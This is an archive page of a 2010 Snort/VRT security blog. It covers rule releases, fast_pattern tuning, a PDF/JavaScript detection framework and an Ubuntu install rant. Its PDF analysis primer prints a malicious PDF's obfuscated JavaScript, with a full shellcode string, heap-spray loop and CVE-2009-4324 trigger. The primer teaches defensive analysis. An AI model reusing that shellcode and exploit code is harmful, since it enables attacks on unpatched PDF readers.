Thursday, April 29, 2010

Rule release for today, Thursday April 29th, 2010

Performance update release for 2.8.6 to utilize HTTP buffers and fast_pattern.

Check here for details.

Tuesday, April 27, 2010

Using Snort fast patterns wisely for fast rules

Anyone that's ever written their own Snort rule has wondered, at some point or another, about how to make their rule(s) faster. While some things are obvious - don't use a PCRE with a bunch of ".*" clauses, for example - others are less so. Today I'd like to go over one of the more subtle methods of speeding up a rule, which has been highlighted by some new features in Snort 2.8.6.

Any rule that has one or more content matches in it has a fast pattern associated with it - the string that Snort puts into its fast pattern matching engine to begin the process of detection. Chosen somewhat intelligently by Snort itself, this pattern is usually the longest string in a rule; as a general rule of thumb, the longer the string is, the faster a rule will be, with strings of four or more bytes typically being necessary to reap the benefits of the fast pattern matcher. Only if this string is found in a packet does Snort evaluate the remaining options in the rule - which means that the fewer times the fast pattern matches, the less performance drag the rule will create on Snort. Thus, the goal of a rule-writer should be to choose a fast pattern that will be as closely associated with the actual triggering conditions of the rule as possible - if you can generate an alert for most of the times you actually enter a rule, you've successfully targeted your detection, and written a rule with the minimum possible performance impact on Snort.

Up until Snort 2.8.6, unfortunately, rule writers had little control over what was chosen as a rule's fast pattern. With the introduction of the fast_pattern keyword and a new config option, however, that's all changed.

Let's start by going over the new config option, since it will provide us with the intelligence we need to properly use the fast_pattern keyword. It's really rather simple; just add:

debug-print-fast-pattern your config detection statement (NOTE: if you try to specify this on a line separate from your non-default config detection statement, you'll end up setting all detection parameters back to their defautls.)

Just add this line to your Snort config, and you're good to go. If you run Snort with this option enabled, you'll get output similar to the following:

Fast pattern matcher: Content
Fast pattern set: no
Fast pattern only: no
Negated: no
Pattern offset,length: none
Pattern truncated: no
Original pattern
Final pattern

For the sake of this example, we're running Snort with just the following rule enabled:

alert udp $HOME_NET any -> $EXTERNAL_NET 5060 (msg:"POLICY Gizmo register VOIP state"; content:"INVITE sip|3A|"; nocase; content:"User-Agent|3A|"; nocase; content:"Gizmo"; nocase; pcre:"/^User-Agent\x3A[^\n\r]+Gizmo/smi"; reference:url,; classtype:policy-violation; sid:6407; rev:1;)

As noted earlier, Snort has chosen the longest available string - "INVITE sip|3A|" - as the fast pattern for the rule. The problem, unfortunately, is that this pattern will match on all SIP invitations, whereas the rule will generate an alert on only a tiny portion of those requests. Clearly, this is sub-optimal from a performance perspective.

With the new fast_pattern keyword, however, we can fix this problem. By updating the rule to read as follows:

alert udp $HOME_NET any -> $EXTERNAL_NET 5060 (msg:"POLICY Gizmo register VOIP state"; content:"INVITE sip|3A|"; nocase; content:"User-Agent|3A|"; nocase; content:"Gizmo"; nocase; fast_pattern; pcre:"/^User-Agent\x3A[^\n\r]+Gizmo/smi"; reference:url,; classtype:policy-violation; sid:6407; rev:1;)

...we get the following output from Snort:

Fast pattern matcher: Content
Fast pattern set: yes
Fast pattern only: no
Negated: no
Pattern offset,length: none
Pattern truncated: no
Original pattern
Final pattern

As you can see, the fast pattern has been changed per the keyword we used, and Snort now notes that we've explicitly set the fast pattern (i.e. "Fast pattern set: yes"). Since the string "Gizmo" is likely to be orders of magnitude less common than "INVITE sip|3A|" in SIP traffic, the number of times this rule is evaluated will drop dramatically, and the rule will get a commensurate performance boost.

So based on this information, given the following rule, what would you expect the fast pattern to be for the following rule?

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"SPYWARE-PUT Hijacker xp antispyware 2009 runtime detection - pre-sale webpage"; flow:to_server,established; uricontent:"/buy.html?"; nocase; uricontent:"wmid="; nocase; uricontent:"skey="; nocase; content:"Host|3A|"; nocase; reference:url,; reference:url,; classtype:misc-activity; sid:16136; rev:2;)

If you answered "Host|3A|", you'd be wrong - because of the way Snort picks fast patterns when you have a mix of buffers:

Fast pattern matcher: URI content
Fast pattern set: no
Fast pattern only: no
Negated: no
Pattern offset,length: none
Pattern truncated: no
Original pattern
Final pattern

As you can see, Snort chose the longest pattern out of the URI buffer. In a lot of cases, this default will make sense - after all, the URI buffer is usually smaller than the regular content buffer, and searching a smaller space will be faster. In this particular case, however, we've ended up with a fast pattern that will be fairly common in web traffic - or, at the very least, more common than a search for a particular host string. Since the goal is to enter the rule as little as possible, we want to override this behavior, and go for the more unique pattern:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"SPYWARE-PUT Hijacker xp antispyware 2009 runtime detection - pre-sale webpage"; flow:to_server,established; uricontent:"/buy.html?"; nocase; uricontent:"wmid="; nocase; uricontent:"skey="; nocase; content:"Host|3A|"; nocase; fast_pattern; reference:url,; reference:url,; classtype:misc-activity; sid:16136; rev:2;)

Fast pattern matcher: Content
Fast pattern set: yes
Fast pattern only: no
Negated: no
Pattern offset,length: none
Pattern truncated: no
Original pattern
Final pattern

We can actually optimize even further from here. As it turns out, once a fast pattern has been matched, and a rule has been entered, Snort will spend CPU cycles looking for the content chosen as the fast pattern again, this time using the content matching engine. While this seems duplicative, in many cases, it's useful; for example, if a content clause follows the one chosen as the fast pattern content, and that second content uses distance and within to force a match only relative to the end of the fast pattern, Snort needs to find the fast pattern that second time to properly evaluate the second content clause. However, for this particular rule, that's not the case, and so there's no point in bothering to find this string a second time. With that in mind, we'll change fast_pattern; to fast_pattern:only;, and save the CPU cycles during rule evaluation. Finally, since the string we're looking for should only be found in the HTTP headers, we'll use the new http_header; keyword to restrict the search to that buffer (which is explicitly split out for the first time in Snort 2.8.6), and end up with the following rule:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"SPYWARE-PUT Hijacker xp antispyware 2009 runtime detection - pre-sale webpage"; flow:to_server,established; uricontent:"/buy.html?"; nocase; uricontent:"wmid="; nocase; uricontent:"skey="; nocase; content:"Host|3A|"; nocase; fast_pattern:only; http_header; reference:url,; reference:url,; classtype:misc-activity; sid:16136; rev:2;)

...and the associated debug output:

Fast pattern matcher: URI content
Fast pattern set: yes
Fast pattern only: yes
Negated: no
Pattern offset,length: none
Pattern truncated: no
Original pattern
Final pattern

(Note: just because the debug output specifies "URI content" here doesn't actually mean that the pattern is being searched for in the URI buffer. I've verified through testing and talking to the development team that the HTTP header buffer is what's being searched here; the output is the way it is because the HTTP-related buffers, including the URI buffer and the header buffer, are grouped together at the point this output is printed.)

One additional item to be cognizant of, for those who begin using the newly available ac-split fast pattern method introduced in 2.8.6, is pattern truncation. The recommended configuration for this method includes the directive "max-pattern-len 20", which will truncate fast patterns at 20 bytes; doing so helps with the memory footprint for Snort, and generally 20 bytes is sufficient for simply using a fast pattern to determine entry into a rule. If your Snort install is set up in this manner, and you need to specify which bytes of a long pattern are the most unique, you can use the fast_pattern:x,y; modifier to the content you're operating on, to specify the start and end bytes of the portion of the content you wish to use as the fast pattern (you can exceed the 20 byte truncation limit by doing this - Snort will take all of the specified bytes). Note that if you specify fast_pattern:only; on a pattern longer than the number of bytes specified in your configuration, the entire pattern will be used, regardless of its size.

With this new functionality in hand, the VRT is busy reviewing our entire ruleset, looking for places where rules can be optimized by proper tweaking of fast pattern settings. Expect to see thousands of changes to the rules over the next several weeks as we work through and implement all of these changes.

Monday, April 26, 2010

Rule release for today - April 26th, 2010

This release contains support for Snort Additionally, new packages have been added that contain 4 digit version numbers.

New package names:
1. snortrules-snapshot-2853_s.tar.gz
2. snortrules-snapshot-2860_s.tar.gz

The packages have been updated with support for Snort Additionally, a number of improvements have been made to the packages to help clarify which packages to use with your specific snort version.

The old package names are still available but they are now symlinked to
the new package names. The symlinks will exist for the next 30 days. This should hopefully prevent auto updaters from failing to update correctly.

Symlinks Subscriber:
1. snortrules-snapshot-2853_s.tar.gz -> snortrules-snapshot-CURRENT_s.tar.gz
2. snortrules-snapshot-2853_s.tar.gz -> snortrules-snapshot-2.8_s.tar.gz

The above is not a typo. The 2853 is symlinked to CURRENT and the 2.8 packages this is intentional, as to not break auto updaters that define CURRENT incorrectly.

Registered Users:
There are no new symlinks for registered users as the new packages won't be available to registered users for 30 days.

Additional Package Updates.

1. Packages are now locked to the version of snort they support. This includes sub directories in the packages. For examples the 2853 packages now only contain SO rules for

2. Snort.conf in etc/ directory has been updated to support additional features in and

3. Preprocessor Rules are now contained in the package.

4. For Sensitive data rules are contained in the package.

Not running and downloading CURRENT / 2.8 / 2853 packages ?:

1. You will need to modify oinkmaster, pulled pork, or whatever update system you are using to remove version specific rule keywords or snort will fail to load.

Thursday, April 22, 2010

A New Detection Framework

We just completed a talk here in Dubai on some detection capability research the VRT has been doing.  The subtitle of the presentation, "What would you do with a pointer and a size?" pretty much sums up the potential of the project.  It all started last December at the SANS IDS conference.  In talking to both attendees and presenters, it became clear there was a lack of capability for high-end security and response personnel.  Repeatedly we were asked about providing a greater depth of detection, dropping a file to disk for longer analysis and logging packets for an extended period of time.  In short, there were solutions needed that weren't being provided.

So Patrick Mullen and I sat down and started fiddling with some ideas.  I worked on deep parsing and detection on PDF files and Patrick worked on ways to provide me the full file data.  Initially we had an SO rule that grabbed PDF files and called my PDF parser.  We got it working, and it was pretty sexy.  But it blocked the Snort process and clearly wasn't the way to go.  It did, however, show that we were on to something.

Lurene, Patrick, Nigel and I then locked ourselves in a room and hammered out the initial design of what would come to be known NRT, the Near Real Time detection project.  The project goals were straightforward, if not easy:  Create a system that allowed arbitrary data sources to pass data to specialized detection systems and provide every scrap of data we could back to the incident response teams.

With this laid out, I got a hold of Mike Cloppert, one of the guys we had spoken to at the IDS conference.  We scheduled a call with the team he works with and discussed with them what they wanted out of a detection system.  At the completion of the call, we all were quite pleased.  Everything they had asked for was already in the design, and quite a bit more as well.  We were on the right track.

Coding began.  This involved every person on the VRT and a lot of late nights.  Our goal for the first phase of POC was to prove that we could use Snort as a datasource for a system that would then provide analysis out of band with network traffic and alert back into the system.  At the end of a hectic month of coding (along with all of our other work) we had a static preprocessor that pulled files off the wire and passed them to a PDF detection module, a ClamAV engine and a pure logging module.  The end result was the capability to thread out (non-blocking) detection of PDf files, handling the common evasion techniques for PDF files and then alert back to Snort:

04/21-11:17:58.1271873878 [**] [300:3221225473:1] URL:/wrl/first.pdf Hostname:wrl Alert Info:Probable exploit of CVE-2009-0658 (JBIG2) detected in object 8, declared as /Length 29/Filter [/FlateDecode/ASCIIHexDecode/JBIG2Decode ]  [**] 

{TCP} ->
04/21-11:17:58.12718738780:0:0:0:0:0 -> 0:0:0:0:0:0 type:0x800 len:0x0 -> TCP TTL:240 TOS:0x10 ID:0 IpLen:20 DgmLen:1280
***AP*** Seq: 0x0  Ack: 0x0  Win: 0x0  TcpLen: 20
55 52 4C 3A 2F 77 72 6C 2F 66 69 72 73 74 2E 70 URL:/wrl/first.p
64 66 20 48 6F 73 74 6E 61 6D 65 3A 77 72 6C 20 df Hostname:wrl 
41 6C 65 72 74 20 49 6E 66 6F 3A 50 72 6F 62 61 Alert Info:Proba
62 6C 65 20 65 78 70 6C 6F 69 74 20 6F 66 20 43 ble exploit of C
56 45 2D 32 30 30 39 2D 30 36 35 38 20 28 4A 42 VE-2009-0658 (JB
49 47 32 29 20 64 65 74 65 63 74 65 64 20 69 6E IG2) detected in
20 6F 62 6A 65 63 74 20 38 2C 20 64 65 63 6C 61 object 8, decla
72 65 64 20 61 73 20 2F 4C 65 6E 67 74 68 20 32 red as /Length 2
39 2F 46 69 6C 74 65 72 20 5B 2F 46 6C 61 74 65 9/Filter [/Flate
44 65 63 6F 64 65 2F 41 53 43 49 49 48 65 78 44 Decode/ASCIIHexD
65 63 6F 64 65 2F 4A 42 49 47 32 44 65 63 6F 64 ecode/JBIG2Decod
65 20 5D 20                                      e ] 


Detection was extremely accurate and specific to the triggering condition of the vulnerability.  The PDF parser inflated the JBIG2 stream, handled any encoding and then looked at the specific conditions required to exploit the reader.  It fully detects attacks generated by the Metasploit framework.  In fact, it was good enough to uncover a bug in the Metasploit JBIG2 module which has now been fixed.  By allowing additional detection, above what is done by the Snort engine now, to occur outside of the packet stream, we are able to provide much more data back to the user.  Which got us to thinking about Javascript...

Anyone who has looked at Javascript data associated with exploits knows that there are often long, random names assigned to variables.  We decided to check for that by jamming all of the variable names together and then doing an entropy check.  If the variable was too random, we'd alert.  For example, one attack file, when taking all the JavaScript variables and putting them together, we get:


Which in turn, leads the NRT to fire:

[**] [300:2147483653:1] URL:/wrl/first.pdf Hostname:wrl Alert Info:The JavaScript variables in object 6, declared as /Length 5994/Filter [/FlateDecode/ASCIIHexDecode ] , show a high degree of entropy [**]

We were in detection nirvana.  Anything we wanted to do, know matter how much processor it took, was available to us.

While sitting in Dubai on day one of HitB, Lurene came up with an idea of how to analyze unescaped data to find shellcode.  The process went like this:  Grab the PDF off the wire, inflate the JavaScript object, determine that it is JavaScript, normalize the unescape() calls and pass the data to a custom nugget written by Lurene.  This nugget then uses heuristics to discover the encoder type, decodes the shellcode and then returns data about the shellcode found.  The result:

[**] [300:3221225482:1] URL:/wrl/first.pdf Hostname:wrl Alert Info:Reverse TCP connectback shellcode detected. Connecting to on port 4444  [**]

This data didn't come from seeing data to port 4444 on host, it came from interpreting shellcode that was unescaped in a compressed object in a PDF that we pulled off the wire. we're excited.

But this system had to be open and it had to be extensible.  It had to be flexible and it had to be verbose in its logging.  So here is what we came up with:


This component is the heart of the system.  It handles data sources and detection nuggets. It manages a central database of all known good and known bad files and URLs.  Additionally, it keeps track of known good and bad sub-components (JS in PDF, for example), so that detection speed is improved and so that we can alert on data subsequently found to be bad. Finally it creates a complete log of detection by writing out not just the original file, but also the normalized versions of the segment of code that creates the alerts.


We want to be able to provide data into the system from any arbitrary location.  Capture a file off the wire with Snort, grab the file via a Milter, pass the file into the system from ClamAV or just hook on-open on a windows system and pass it to the system?   All of that should be handled and available through an API.


For any given data handler one or more nuggets should be available.  The nuggets should be able to pass data to other nuggets.  For example, a PDF nugget that finds embedded JavaScript data should be able to pass just that block into a Javascript system.


Snort registers with the Dispatcher as a Data Handler.  The Nugget Farm is populated by both a PDF and a JavaScript nugget.  Snort grabs the file and sends it to the PDF nugget.  The PDF parser finds the JavaScript block and sends it to the JavaScript nugget.  When the JavaScript nugget alerts, it sends the normalized data back to the Dispatcher.  When the PDF file alerts on the JBIG section it sends the data in the JBIG section as well as the entire file back to the Dispatcher.  The dispatcher writes each section and the associated alerts to disk in addition to the full file.  Finally it alerts into the Snort system.

There are more details, such as how we alert back in time (no sonic screwdriver required).  But we'll get to that.  For now we want to see what you would do if we handled you a pointer and a size.  So we've put up some rough (very rough) POC code at  Review the code in src/preprocessor/nrt_* to see what we're up to.  Modeling that code you should be able to write your own C code to do detection against files pulled by the system.

We've got a long way to go, with a ton of research in front of us.  There is no time-line for full release, but we're interested in seeing what you come up with.  As we create additional documentation and nail down more functionality, we'll continue updating the code.  Keep an eye on labs and the VRT blog for updates.  In the meantime, go poke around and let us know what you come up with.

Code & Dubai Presentation available at:

Thursday, April 15, 2010

Rule release for today, Thursday April 15th, 2010

Maintenance release, a few new rules and modifications to existing ones.

Check here for details.

Tuesday, April 13, 2010

April 2010 Vulnerability Report

Rule release for today, Tuesday April 13th, 2010

Microsoft Tuesday and Adobe Quarterly Patch. Details available here.

Microsoft Security Advisory (MS10-019):
The Microsoft CAB Subject Interface Package (SIP) implementation contains a programming error that may allow a remote attacker to bypass the authentication mechanism.

Microsoft Security Advisory (MS10-020):
The Microsoft implementation of the SMB protocol contains programming errors that may allow a remote attacker to execute code on an affected system.

Microsoft Security Advisory (MS10-023):
Microsoft Publisher contains a programming error that may allow a remote attacker to execute code on an affected system.

Microsoft Security Advisory (MS10-024):
The Microsoft SMTP service is prone to a Denial of Service condition that may be triggered by a remote attacker.

Microsoft Security Advisory (MS10-025):
The Microsoft Windows Media Service suffers from a programming error that may allow a remote attacker to execute code on an affected system.

Microsoft Security Advisory (MS10-026):
Microsoft Windows Media Player contains a programming error that may allow a remote attacker to execute code on an affected system.

Microsoft Security Advisory (MS10-027):
Microsoft Windows Media Player contains a programming error that may allow a remote attacker to execute code on an affected system via an ActiveX control.

Microsoft Security Advisory (MS10-028):
Microsoft Visio suffers from programming errors that may allow a remote attacker to execute code on an affected system.

Microsoft Security Advisory (MS10-029):
The Microsoft implementation of IPv6 contains a programming error that may allow a remote attacker to spoof connections to an affected host.

Thursday, April 8, 2010

Rule release for today, Thursday April 8th, 2010

Mostly some small fixes, couple of reference changes and some new rules.

Check it out here

Wednesday, April 7, 2010

WTF, Ubuntu?

I just finished installing Ubuntu 9.10 server edition on a shiny new Dell PowerEdge R805 box, as part of expanding our malware analysis labs. No big deal - half an hour of babysitting an installer, right?


It took me 5 hours, thanks to some really stupid decisions made by the Ubunutu team surrounding perhaps the most vital part of the installation process: the bootloader.

The actual install itself was nice and easy, just like I've come to expect out of the Ubuntu folks: sane defaults, good explanations when I had to make a relevant choice, and generally minimal requirements for interactivity. Anybody with even the most basic computer experience could fumble their way through it. After finishing, I took my CD out, rebooted...and suddenly found myself at a Busybox shell with a note about GRUB being unable to find the root filesystem.

I figured I'd done something really retarded, because in all of the years I've been installing *NIX operating systems, I've only had one other bootloader failure - an OpenBSD "Bad Magic" issue when I was swapping out hard drives that made immediate sense once I did two seconds worth of Googling, and that yielded a fun little picture in the process. So I sat down, thought for a second, and then realized I'd installed the 32-bit version of Ubunutu on a box with 8GB of RAM and a terabyte worth of hard drive - which sure seemed like a good reason for the OS to not be seeing the drive properly.

So I headed back to my desk, burned a copy of the 64-bit version, reinstalled, and got...the exact same Busybox shell. Damnit!

A quick bit of Googling seemed to suggest that there were issues with GRUB recognizing really big disks. Since I'd just used the whole drive with Ubuntu's guided LVM setup, I figured that either my /boot partition was way off past the end of where GRUB could read, or that my / partition was just too big for it to handle. That's what I get for being lazy, I figured, and headed back into installer land, this time manually partitioning things so that /boot was at the very start of the drive, / was 50GB, and /var took up the rest of the space. Another 30-minute installation later, I rebooted, figuring I'd be all set.

Not so much.

Confused, I followed the suggestion at the Busybox shell and did a "cat /proc/modules". Sure enough, mptbase, mptsas, and scsi_transport_sas were all loaded - exactly the modules I needed to be able to see this SAS/MPT BIOS controller. /dev/sda* existed, and inspecting /boot/grub/grub.cfg (side note: Linux people, can we *please* agree on one frikkin' extension for config files?) showed that my root device was set properly. What the hell?

Getting desperate, I spent some substantial time scouring the web for answers. It seems that a number of people have had problems installing various versions of Ubuntu on the R805 boxes - but in classic Linux style, any time someone popped onto a forum or a mailing list asking how to fix boot issues with this hardware, the thread ended with some variant of "Hey, I figured it out! Thanks guys!", and NO GODDAMNED DESCRIPTION OF HOW THEY FIXED THE PROBLEM. Seriously, people, it takes like two minutes to explain the fix, and it will save countless people countless hours of pain if you just make sure your solution is archived somewhere on the web.

After trying a whole host of possible fixes - setting the SAS controller to be visible to "BIOS only" instead of "BIOS & OS", telling the CD installer to boot off the first hard drive, etc. - I ran across this little nugget of wisdom, which suggested that I set my "rootdelay" value to 35 to give the SAS adapter time to initialize.

Aha! That made perfect sense, I figured. After all, this entire process had been further aggravated by the 30 seconds or so it takes the Dell SAS controller to initialize on each boot (seriously, people, how does it take a hard disk controller 30 f'ing seconds to initialize on a machine with 8 2.5GHz cores?); why wouldn't it want to waste another 30 seconds of my life re-initializing after the operating system loaded?

Optimistic about my prospects for success, I rebooted yet again, held down shift like the article suggested...and got no GRUB menu. I tried again with "e" (which I vaguely remembered using on some other bootloader in years gone by), and again with "Esc". The third time being a charm, I decided to brute-force the issue, popped the installer disc back in the drive, and chose "Rescue Broken System" from the menu.

This is where I started to realize how broken Ubuntu's installation has become.

At first, I thought I'd accidentally chosen "Install Ubuntu" from the menu, because the system proceeded along all of the same steps as a regular install. It even went to the trouble of finding my network hardware, having me choose an interface to do DHCP on, and set a hostname. Seriously, guys, I promise I don't need a fully functional network just to go touch my bootloader, repair a broken partition, or, you know, do anything else that would require me to use a CD to boot. You're just wasting my time.

Once I finally got my shell and headed on over to edit /boot/grub/grub.cfg, I realized the reason I could't get into the GRUB menu: the default timeout value had been set to "-1", i.e. "don't wait at all". Gee, guys, that makes so much sense - because, you know, no one will ever need to edit their GRUB config on the fly! That, and setting a delay of 1 second would just be too much hassle for people trying to boot up nice and fast on their shiny new servers with the 90-second delay to get into the bootloader.

With the delay fixed and GRUB reinstalled, I booted up again, and this time actually got to the GRUB menu. Much to my horror, the banner on the top read:

"GRUB version 1.97~beta4"

Really, Ubuntu? Seriously? You're going to put a beta version of a bootloader on the production release of a server operating system? What cutting-edge boot-loading feature could you possibly need that you couldn't use a release version of GRUB?

Cursing the Ubuntu developers under my breath, I added the rootdelay value, hit Ctrl-x to boot, waited...and had a fully operational operating system in under a minute! Hallelujah!

Convinced that I was done, I added the rootdelay value to /boot/grub/grub.cfg, ran "update-grub" as root to make the changes permanent, and rebooted one last time, just to be sure. It's a good thing I did, too, because MY CHANGES WEREN'T SAVED, and I ended right back up at my Busybox shell. I had to go in through the rescue option on the installer CD, make my changes there, and update GRUB from my CD just to get the changes to stick.

With all of the effort the Ubuntu people put into making their installation simple, you'd think they could have gone to the trouble of setting the "rootdelay" variable to a higher value when they saw a SAS card that they probably know takes forever to initialize. Really, would that be so hard, guys?

Monday, April 5, 2010

Matt's Primer for PDF Analysis

For obvious reasons, the VRT has been spending a lot of time on the PDF format lately. While the attack researchers have been concentrating on fuzzing, reverse engineering and data flow analysis, the defense researchers have been automating the backend analysis of PDF submissions. As part of this effort, we've had to do a very deep dive on the PDF format. I thought it might be useful to share some of what we're seeing come in our data feeds, and what you should look for when reviewing PDF files.

So let's start with the first structure you have to understand, the obj structure. For the moment, most everything you really are going to worry about occurs in association with either the obj tags or Javascript. Here is the obj tag format:

[objnum] [genid] obj (value) endobj

Obj tags declare what sort of data is in this section of the file. They should be pretty straight forward:
4 0 obj.<< /Length 5 0 R /Filter /FlateDecode >> stream (Ton of data...) endstream endobj 5 0 obj 185 endobj

The first object above is object number 4 with a genid of 0. Note that the combination of the object number and gen id are a unique identifier within the PDF spec. While I haven't seen an example with multiple objnums and genids, I wouldn't put it past someone to give it a shot. Inside the << >> is a definition of what it is that this object holds. The object in question is FlateDecoded stream. It also has a relative reference that you have to understand. The “/Length” field declares the length of the stream data. In this case, that value is contained in object number 5. We know this because of the “ R” structure immediately following the “/Length” tag.

This seems simple, but Adobe has to support extended characters for the various languages around the world. To support this, they provided the option to ASCII hex encode fields within the PDF document. This is done by placing the ASCII hexadecimal value for the character you are representing immediately after a “#” character. So the letter “A” can be represented as #41.

So attackers use this feature to obscure the feature calls so you can’t look specifically object tags like JBIG2 or JavaScript tags. So the following object string:

/Type/Action/S/JavaScript/JS 6 0 R

Could be represented as:

/Typ#65/#41#63t#69#6fn/S/#4a#61#76a#53cript/J#53 6 0 R

You can use Didier Stevens’ script to deobfuscated object tags with ASCII hex encoding. So the file we’re looking at has the following deobfuscated lines:

(obj 1) /Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 5 0 R
(obj 2) /Type/Outlines/Count 0
(obj 3)/Type/Pages/Kids[4 0 R]/Count 1
(obj 4) /Type/Page/Parent 3 0 R/MediaBox[0 0 612 792]
(obj 5) /Type/Action/S/JavaScript/JS 6 0 R
(obj 6) /Length 2008/Filter[/FlateDecode/ASCIIHexDecode]

Besides the obfuscation, the OpenAction->Javascript->FlateDecode sequence should immediately concern you.  The OpenAction declaration in the object tag means that the associated data should immediately be executed.  In this case it is a relative reference to object 5.  Object 5 in turn declares the data as JavaScript and points to object 6.  Object 6 is a deflated stream of data, which gives us a new obstacle to deal with.

So object 6 looks like this:
00000190  3E 65 6E 64 6F 62 6A 0D 0A 36 20 30 20 6F 62 6A <endobj..6 0 obj
000001A0  3C 3C 2F 4C 23 36 35 6E 23 36 37 23 37 34 68 20 <</L#65n#67#74h 
000001B0  32 30 30 38 2F 23 34 36 69 6C 23 37 34 65 23 37 2008/#46il#74e#7
000001C0  32 5B 2F 23 34 36 6C 23 36 31 74 65 44 23 36 35 2[/#46l#61teD#65
000001D0  63 23 36 66 64 65 2F 23 34 31 53 23 34 33 23 34 c#6fde/#41S#43#4
000001E0  39 23 34 39 23 34 38 65 23 37 38 23 34 34 23 36 9#49#48e#78#44#6
000001F0  35 23 36 33 23 36 66 23 36 34 23 36 35 5D 3E 3E 5#63#6f#64#65]>>
00000200  0D 0A 73 74 72 65 61 6D 0D 0A 78 9C 7D 59 6D 92}Ym.
00000210  EB 36 0C BB 8A 8E 60 EB D3 FE D3 BB 64 B3 DB FB .6....`.....d...
00000220  1F A1 24 01 52 92 93 E9 4C 37 4D 64 89 22 41 10 ..$.R...L7Md."A.
00000230  94 F5 8E 57 1A 3D F5 33 8D 9C 52 CA 87 7C D4 7F ...W.=.3..R..|..
00000240  E5 A3 BF E5 CB 4B BE B4 91 9A 3C EA FA 57 75 6E .....K....>..Wun
00000250  C2 47 6F FA 4D 3F 64 B1 4D 4B FD 4E AD CA B2 92 .Go.M?d.MK.N....
00000260  FA 0B 13 C6 0D 2B 3A 3C C4 76 BF 6C 48 0D A6 21 .....+:>.v.lH..!

Using Didier Stevens’ pdf-parser, we can get an inflated view of object 6 we can inflate object 6 by using the following arguments:
[kpyke@segfault]$./ -o6 -f bad.pdf

Let’s take the output one block at a time.  Looking at this, your first thought is probably "What the hell is with that variable name?".  This is a common JavaScript obfuscation technique.  By randomizing the variable names, it is difficult for IDS/AV systems to target them with set signatures.  It is definitely a sign that this file is jacked.

The first variable puts the shellcode into memory:

var OlJWRbdvveuaWiTCjeyJTphyRwPgnwjlnPwhiTXRqYmV = unescape("%uc931%u89bf%ucf5a%ub1ac%udb48%ud9ca%u2474%u5af4%uea83%u31fc%u0d7a%u7a03%ue20d%ua67c%u2527%u577e%u56b8%ub2f7%u4489%ub663%u58b8%u9ae0%u1230%u0ea4%u56c2%u2060%udc63%u0f56%ud074%uc356%u72b6%u1e2a%u54eb%ud113%u95fe%u0c54%uc4f0%u5a0d%uf8a3%u1e3a%uf878%u14ec%u82c0%ueb89%u38b5%u3b90%u3665%ua3da%u100d%ud2fa%u42c2%u9dc6%ub06f%u1fbd%u88a6%u2e3e%u4786%u9e01%u990b%u1946%uecf4%u59bc%uf689%u2307%u7255%u8395%u241e%u357d%ub3f2%u39f6%ub0bf%u5e50%u143e%u5aeb%u9bcb%ueb3b%ubf8f%ub79f%ua154%u1d86%ude3a%ufad8%u7ae3%ue993%ufdf0%u67fe%u8f06%uc185%u8f08%u6185%ube61%uee0e%u3ff6%u4ac5%u0a08%ufa47%ud381%ube12%ue3cf%ufdc9%u67e9%u7dfb%u770e%u788e%u3f4a%uf163%uaac3%ua683%ufee4%u25e0%u2f7f%ucd83%u0f1a%u4d64%u21c5%ue51f%ucb25%u60ac%u1354%u0e3f%u32ec%ua0cc%uda60%u355b%u4959%uc1fe%ue2f8%u4670%u6d94%ub604%u2f45%uf2a0%u89b9%udb0e%ub0d7%u3b3a%u5444%u5aa1%ucdf8%uf257%u6275%u4db7%uef12%u23de%u9cb3%uce54%u1722%u5cfb%uf7d6%uc46e%u996c%u7603%u36e1%u028a%ue7d9%uaf0d%uf85d");

The second block of code sets up the heap spray and adjust the
<var WmBcOiflJCZIlBHlQMYvLqUsYVqUOiZajvemAdT = unescape("%u41b1%u483f");
while(WmBcOiflJCZIlBHlQMYvLqUsYVqUOiZajvemAdT.length >= 32768) WmBcOiflJCZIlBHlQMYvLqUsYVqUOiZajvemAdT+=WmBcOiflJCZIlBHlQMYvLqUsYVqUOiZajvemAdT;WmBcOiflJCZIlBHlQMYvLqUsYVqUOiZajvemAdT=WmBcOiflJCZIlBHlQMYvLqUsYVqUOiZajvemAdT.substring(0,32768 - OlJWRbdvveuaWiTCjeyJTphyRwPgnwjlnPwhiTXRqYmV.length);
memory=new Array();

for(i=0;i<0x2000;i++) {
     memory[i]= WmBcOiflJCZIlBHlQMYvLqUsYVqUOiZajvemAdT + OlJWRbdvveuaWiTCjeyJTphyRwPgnwjlnPwhiTXRqYmV;

The final block is the vulnerability triggering condition.  In this case, it is an exploit of the media.newPlayer vulnerability in Adobe Reader (CVE-2009-4324):
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
try {;} catch(e) {}
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
So to recap, important things to know about PDFs, just to get started:
  1.  ASCII hex encoding, particularly alternating between non-encoded and encoded characters, should raise red flags.
  2.  The OpenAction tag should get your attention, but it does exist in valid documents.
  3.  You need to get out there and check out JavaScript obfuscation, although you should certainly be able to just point to the block and go "I don't know what the hell that is, but it ain't right".
  4.  In particular, look for the following JS obfuscation keywords:
    • unescape
    • syncAnnotScan
    • getAnnots
    • replace
  5. In particular, look for the following JS obfuscation techniques:
    • Renaming functions and then calling the new name
    • Providing blocks of ASCII hex encoded data separated by a single character and then replacing that char with a "%", then using that block as an unescape.
    • Randomized variable strings
  6.  4 & 5 aren't even close to an exhaustive list.
  7.  Track the work of Didier Stevens:
  8.  Most of the bad stuff you'll see will look wrong right out of the box. Trust your instincts.

Thursday, April 1, 2010

What in the name!...

If you are confused by the naming of ClamAV products, here's a quick breakdown:
  • ClamAV®: open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways. Available here.
  • ClamAV® (Win32 binaries): Win32 port of ClamAV. Available here.
  • ClamAV® for Windows: Microsoft® Windows-specific Anti-Virus (AV) solution using an advanced Cloud-based protection mechanism. Developed in partnership with Immunet Corporation. Available here.
The products listed above are the only ones developed and maintained by Sourcefire® Inc.

New Mac OSX Module for Snort

Today, the VRT is excited to announce a revolutionary new module for the Snort Intrusion Detection System.  The extraordinary capability of Snort to be molded through rules, so_rules, preprocessors and the fact that the entire code base is open gives us unprecedented capability to bring to our customers what they truly need.  That is why the VRT has been working hard for the past two months to deliver this new functionality.  We hope you enjoy it as much as we will enjoy not working on it anymore.

